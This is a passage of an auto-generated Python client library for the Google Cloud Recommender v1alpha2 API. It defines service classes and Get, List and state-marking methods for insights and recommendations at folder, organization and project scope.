response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
class FoldersLocationsInsightTypesService(base_api.BaseApiService):
"""Service class for the folders_locations_insightTypes resource."""
_NAME = 'folders_locations_insightTypes'
def __init__(self, client):
super(RecommenderV1alpha2.FoldersLocationsInsightTypesService, self).__init__(client)
self._upload_configs = {
}
class FoldersLocationsRecommendersRecommendationsService(base_api.BaseApiService):
"""Service class for the folders_locations_recommenders_recommendations resource."""
_NAME = 'folders_locations_recommenders_recommendations'
def __init__(self, client):
super(RecommenderV1alpha2.FoldersLocationsRecommendersRecommendationsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the requested recommendation. Requires the recommender.*.get IAM permission for the specified recommender.
Args:
request: (RecommenderFoldersLocationsRecommendersRecommendationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}',
http_method='GET',
method_id='recommender.folders.locations.recommenders.recommendations.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}',
request_field='',
request_type_name='RecommenderFoldersLocationsRecommendersRecommendationsGetRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists recommendations for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified recommender.
Args:
request: (RecommenderFoldersLocationsRecommendersRecommendationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2ListRecommendationsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations',
http_method='GET',
method_id='recommender.folders.locations.recommenders.recommendations.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1alpha2/{+parent}/recommendations',
request_field='',
request_type_name='RecommenderFoldersLocationsRecommendersRecommendationsListRequest',
response_type_name='GoogleCloudRecommenderV1alpha2ListRecommendationsResponse',
supports_download=False,
)
def MarkActive(self, request, global_params=None):
r"""Mark the Recommendation State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED recommendation has to be marked back as ACTIVE. MarkRecommendationActive can be applied to recommendations in DISMISSED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderFoldersLocationsRecommendersRecommendationsMarkActiveRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkActive')
return self._RunMethod(
config, request, global_params=global_params)
MarkActive.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markActive',
http_method='POST',
method_id='recommender.folders.locations.recommenders.recommendations.markActive',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markActive',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationActiveRequest',
request_type_name='RecommenderFoldersLocationsRecommendersRecommendationsMarkActiveRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkClaimed(self, request, global_params=None):
r"""Marks the Recommendation State as Claimed. Users can use this method to indicate to the Recommender API that they are starting to apply the recommendation themselves. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationClaimed can be applied to recommendations in CLAIMED or ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderFoldersLocationsRecommendersRecommendationsMarkClaimedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkClaimed')
return self._RunMethod(
config, request, global_params=global_params)
MarkClaimed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markClaimed',
http_method='POST',
method_id='recommender.folders.locations.recommenders.recommendations.markClaimed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markClaimed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationClaimedRequest',
request_type_name='RecommenderFoldersLocationsRecommendersRecommendationsMarkClaimedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkDismissed(self, request, global_params=None):
r"""Mark the Recommendation State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE recommendation has to be marked back as DISMISSED. MarkRecommendationDismissed can be applied to recommendations in ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderFoldersLocationsRecommendersRecommendationsMarkDismissedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkDismissed')
return self._RunMethod(
config, request, global_params=global_params)
MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markDismissed',
http_method='POST',
method_id='recommender.folders.locations.recommenders.recommendations.markDismissed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markDismissed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationDismissedRequest',
request_type_name='RecommenderFoldersLocationsRecommendersRecommendationsMarkDismissedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkFailed(self, request, global_params=None):
r"""Marks the Recommendation State as Failed. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation failed. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationFailed can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderFoldersLocationsRecommendersRecommendationsMarkFailedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkFailed')
return self._RunMethod(
config, request, global_params=global_params)
MarkFailed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markFailed',
http_method='POST',
method_id='recommender.folders.locations.recommenders.recommendations.markFailed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markFailed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationFailedRequest',
request_type_name='RecommenderFoldersLocationsRecommendersRecommendationsMarkFailedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkSucceeded(self, request, global_params=None):
r"""Marks the Recommendation State as Succeeded. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation was successful. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationSucceeded can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderFoldersLocationsRecommendersRecommendationsMarkSucceededRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkSucceeded')
return self._RunMethod(
config, request, global_params=global_params)
MarkSucceeded.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markSucceeded',
http_method='POST',
method_id='recommender.folders.locations.recommenders.recommendations.markSucceeded',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markSucceeded',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationSucceededRequest',
request_type_name='RecommenderFoldersLocationsRecommendersRecommendationsMarkSucceededRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
class FoldersLocationsRecommendersService(base_api.BaseApiService):
"""Service class for the folders_locations_recommenders resource."""
_NAME = 'folders_locations_recommenders'
def __init__(self, client):
super(RecommenderV1alpha2.FoldersLocationsRecommendersService, self).__init__(client)
self._upload_configs = {
}
class FoldersLocationsService(base_api.BaseApiService):
"""Service class for the folders_locations resource."""
_NAME = 'folders_locations'
def __init__(self, client):
super(RecommenderV1alpha2.FoldersLocationsService, self).__init__(client)
self._upload_configs = {
}
class FoldersService(base_api.BaseApiService):
"""Service class for the folders resource."""
_NAME = 'folders'
def __init__(self, client):
super(RecommenderV1alpha2.FoldersService, self).__init__(client)
self._upload_configs = {
}
class OrganizationsLocationsInsightTypesInsightsService(base_api.BaseApiService):
"""Service class for the organizations_locations_insightTypes_insights resource."""
_NAME = 'organizations_locations_insightTypes_insights'
def __init__(self, client):
super(RecommenderV1alpha2.OrganizationsLocationsInsightTypesInsightsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the requested insight. Requires the recommender.*.get IAM permission for the specified insight type.
Args:
request: (RecommenderOrganizationsLocationsInsightTypesInsightsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}',
http_method='GET',
method_id='recommender.organizations.locations.insightTypes.insights.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}',
request_field='',
request_type_name='RecommenderOrganizationsLocationsInsightTypesInsightsGetRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists insights for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified insight type.
Args:
request: (RecommenderOrganizationsLocationsInsightTypesInsightsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2ListInsightsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights',
http_method='GET',
method_id='recommender.organizations.locations.insightTypes.insights.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1alpha2/{+parent}/insights',
request_field='',
request_type_name='RecommenderOrganizationsLocationsInsightTypesInsightsListRequest',
response_type_name='GoogleCloudRecommenderV1alpha2ListInsightsResponse',
supports_download=False,
)
def MarkAccepted(self, request, global_params=None):
r"""Marks the Insight State as Accepted. Users can use this method to indicate to the Recommender API that they have applied some action based on the insight. This stops the insight content from being updated. MarkInsightAccepted can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight.
Args:
request: (RecommenderOrganizationsLocationsInsightTypesInsightsMarkAcceptedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkAccepted')
return self._RunMethod(
config, request, global_params=global_params)
MarkAccepted.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markAccepted',
http_method='POST',
method_id='recommender.organizations.locations.insightTypes.insights.markAccepted',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markAccepted',
request_field='googleCloudRecommenderV1alpha2MarkInsightAcceptedRequest',
request_type_name='RecommenderOrganizationsLocationsInsightTypesInsightsMarkAcceptedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def MarkActive(self, request, global_params=None):
r"""Mark the Insight State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED insight has to be marked back as ACTIVE. MarkInsightActive can be applied to insights in DISMISSED state. Requires the recommender.*.update IAM permission for the specified insight type.
Args:
request: (RecommenderOrganizationsLocationsInsightTypesInsightsMarkActiveRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkActive')
return self._RunMethod(
config, request, global_params=global_params)
MarkActive.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markActive',
http_method='POST',
method_id='recommender.organizations.locations.insightTypes.insights.markActive',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markActive',
request_field='googleCloudRecommenderV1alpha2MarkInsightActiveRequest',
request_type_name='RecommenderOrganizationsLocationsInsightTypesInsightsMarkActiveRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def MarkDismissed(self, request, global_params=None):
r"""Mark the Insight State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE insight should be dismissed. MarkInsightDismissed can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight type.
Args:
request: (RecommenderOrganizationsLocationsInsightTypesInsightsMarkDismissedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkDismissed')
return self._RunMethod(
config, request, global_params=global_params)
MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markDismissed',
http_method='POST',
method_id='recommender.organizations.locations.insightTypes.insights.markDismissed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markDismissed',
request_field='googleCloudRecommenderV1alpha2MarkInsightDismissedRequest',
request_type_name='RecommenderOrganizationsLocationsInsightTypesInsightsMarkDismissedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
class OrganizationsLocationsInsightTypesService(base_api.BaseApiService):
"""Service class for the organizations_locations_insightTypes resource."""
_NAME = 'organizations_locations_insightTypes'
def __init__(self, client):
super(RecommenderV1alpha2.OrganizationsLocationsInsightTypesService, self).__init__(client)
self._upload_configs = {
}
class OrganizationsLocationsRecommendersRecommendationsService(base_api.BaseApiService):
"""Service class for the organizations_locations_recommenders_recommendations resource."""
_NAME = 'organizations_locations_recommenders_recommendations'
def __init__(self, client):
super(RecommenderV1alpha2.OrganizationsLocationsRecommendersRecommendationsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the requested recommendation. Requires the recommender.*.get IAM permission for the specified recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersRecommendationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}',
http_method='GET',
method_id='recommender.organizations.locations.recommenders.recommendations.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}',
request_field='',
request_type_name='RecommenderOrganizationsLocationsRecommendersRecommendationsGetRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists recommendations for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersRecommendationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2ListRecommendationsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations',
http_method='GET',
method_id='recommender.organizations.locations.recommenders.recommendations.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1alpha2/{+parent}/recommendations',
request_field='',
request_type_name='RecommenderOrganizationsLocationsRecommendersRecommendationsListRequest',
response_type_name='GoogleCloudRecommenderV1alpha2ListRecommendationsResponse',
supports_download=False,
)
def MarkActive(self, request, global_params=None):
r"""Mark the Recommendation State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED recommendation has to be marked back as ACTIVE. MarkRecommendationActive can be applied to recommendations in DISMISSED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersRecommendationsMarkActiveRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkActive')
return self._RunMethod(
config, request, global_params=global_params)
MarkActive.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markActive',
http_method='POST',
method_id='recommender.organizations.locations.recommenders.recommendations.markActive',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markActive',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationActiveRequest',
request_type_name='RecommenderOrganizationsLocationsRecommendersRecommendationsMarkActiveRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkClaimed(self, request, global_params=None):
r"""Marks the Recommendation State as Claimed. Users can use this method to indicate to the Recommender API that they are starting to apply the recommendation themselves. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationClaimed can be applied to recommendations in CLAIMED or ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersRecommendationsMarkClaimedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkClaimed')
return self._RunMethod(
config, request, global_params=global_params)
MarkClaimed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markClaimed',
http_method='POST',
method_id='recommender.organizations.locations.recommenders.recommendations.markClaimed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markClaimed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationClaimedRequest',
request_type_name='RecommenderOrganizationsLocationsRecommendersRecommendationsMarkClaimedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkDismissed(self, request, global_params=None):
r"""Mark the Recommendation State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE recommendation has to be marked back as DISMISSED. MarkRecommendationDismissed can be applied to recommendations in ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersRecommendationsMarkDismissedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkDismissed')
return self._RunMethod(
config, request, global_params=global_params)
MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markDismissed',
http_method='POST',
method_id='recommender.organizations.locations.recommenders.recommendations.markDismissed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markDismissed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationDismissedRequest',
request_type_name='RecommenderOrganizationsLocationsRecommendersRecommendationsMarkDismissedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkFailed(self, request, global_params=None):
r"""Marks the Recommendation State as Failed. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation failed. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationFailed can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersRecommendationsMarkFailedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkFailed')
return self._RunMethod(
config, request, global_params=global_params)
MarkFailed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markFailed',
http_method='POST',
method_id='recommender.organizations.locations.recommenders.recommendations.markFailed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markFailed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationFailedRequest',
request_type_name='RecommenderOrganizationsLocationsRecommendersRecommendationsMarkFailedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkSucceeded(self, request, global_params=None):
r"""Marks the Recommendation State as Succeeded. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation was successful. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationSucceeded can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersRecommendationsMarkSucceededRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkSucceeded')
return self._RunMethod(
config, request, global_params=global_params)
MarkSucceeded.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markSucceeded',
http_method='POST',
method_id='recommender.organizations.locations.recommenders.recommendations.markSucceeded',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markSucceeded',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationSucceededRequest',
request_type_name='RecommenderOrganizationsLocationsRecommendersRecommendationsMarkSucceededRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
class OrganizationsLocationsRecommendersService(base_api.BaseApiService):
"""Service class for the organizations_locations_recommenders resource."""
_NAME = 'organizations_locations_recommenders'
def __init__(self, client):
super(RecommenderV1alpha2.OrganizationsLocationsRecommendersService, self).__init__(client)
self._upload_configs = {
}
def GetConfig(self, request, global_params=None):
r"""Gets the requested Recommender Config. There is only one instance of the config for each Recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersGetConfigRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2RecommenderConfig) The response message.
"""
config = self.GetMethodConfig('GetConfig')
return self._RunMethod(
config, request, global_params=global_params)
GetConfig.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/config',
http_method='GET',
method_id='recommender.organizations.locations.recommenders.getConfig',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}',
request_field='',
request_type_name='RecommenderOrganizationsLocationsRecommendersGetConfigRequest',
response_type_name='GoogleCloudRecommenderV1alpha2RecommenderConfig',
supports_download=False,
)
class OrganizationsLocationsService(base_api.BaseApiService):
"""Service class for the organizations_locations resource."""
_NAME = 'organizations_locations'
def __init__(self, client):
super(RecommenderV1alpha2.OrganizationsLocationsService, self).__init__(client)
self._upload_configs = {
}
class OrganizationsService(base_api.BaseApiService):
"""Service class for the organizations resource."""
_NAME = 'organizations'
def __init__(self, client):
super(RecommenderV1alpha2.OrganizationsService, self).__init__(client)
self._upload_configs = {
}
class ProjectsLocationsInsightTypesInsightsService(base_api.BaseApiService):
"""Service class for the projects_locations_insightTypes_insights resource."""
_NAME = 'projects_locations_insightTypes_insights'
def __init__(self, client):
super(RecommenderV1alpha2.ProjectsLocationsInsightTypesInsightsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the requested insight. Requires the recommender.*.get IAM permission for the specified insight type.
Args:
request: (RecommenderProjectsLocationsInsightTypesInsightsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}',
http_method='GET',
method_id='recommender.projects.locations.insightTypes.insights.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}',
request_field='',
request_type_name='RecommenderProjectsLocationsInsightTypesInsightsGetRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists insights for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified insight type.
Args:
request: (RecommenderProjectsLocationsInsightTypesInsightsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2ListInsightsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights',
http_method='GET',
method_id='recommender.projects.locations.insightTypes.insights.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1alpha2/{+parent}/insights',
request_field='',
request_type_name='RecommenderProjectsLocationsInsightTypesInsightsListRequest',
response_type_name='GoogleCloudRecommenderV1alpha2ListInsightsResponse',
supports_download=False,
)
def MarkAccepted(self, request, global_params=None):
r"""Marks the Insight State as Accepted. Users can use this method to indicate to the Recommender API that they have applied some action based on the insight. This stops the insight content from being updated. MarkInsightAccepted can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight.
Args:
request: (RecommenderProjectsLocationsInsightTypesInsightsMarkAcceptedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkAccepted')
return self._RunMethod(
config, request, global_params=global_params)
MarkAccepted.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markAccepted',
http_method='POST',
method_id='recommender.projects.locations.insightTypes.insights.markAccepted',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markAccepted',
request_field='googleCloudRecommenderV1alpha2MarkInsightAcceptedRequest',
request_type_name='RecommenderProjectsLocationsInsightTypesInsightsMarkAcceptedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def MarkActive(self, request, global_params=None):
r"""Mark the Insight State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED insight has to be marked back as ACTIVE. MarkInsightActive can be applied to insights in DISMISSED state. Requires the recommender.*.update IAM permission for the specified insight type.
Args:
request: (RecommenderProjectsLocationsInsightTypesInsightsMarkActiveRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkActive')
return self._RunMethod(
config, request, global_params=global_params)
MarkActive.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/projects/{projectsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markActive',
http_method='POST',
method_id='recommender.projects.locations.insightTypes.insights.markActive',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markActive',
request_field='googleCloudRecommenderV1alpha2MarkInsightActiveRequest',
request_type_name='RecommenderProjectsLocationsInsightTypesInsightsMarkActiveRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def MarkDismissed(self, request, global_params=None):
r"""Mark the Insight State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE insight should be dismissed. MarkInsightDismissed can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight type.
Args:
request: (RecommenderProjectsLocationsInsightTypesInsightsMarkDismissedRequest) input message
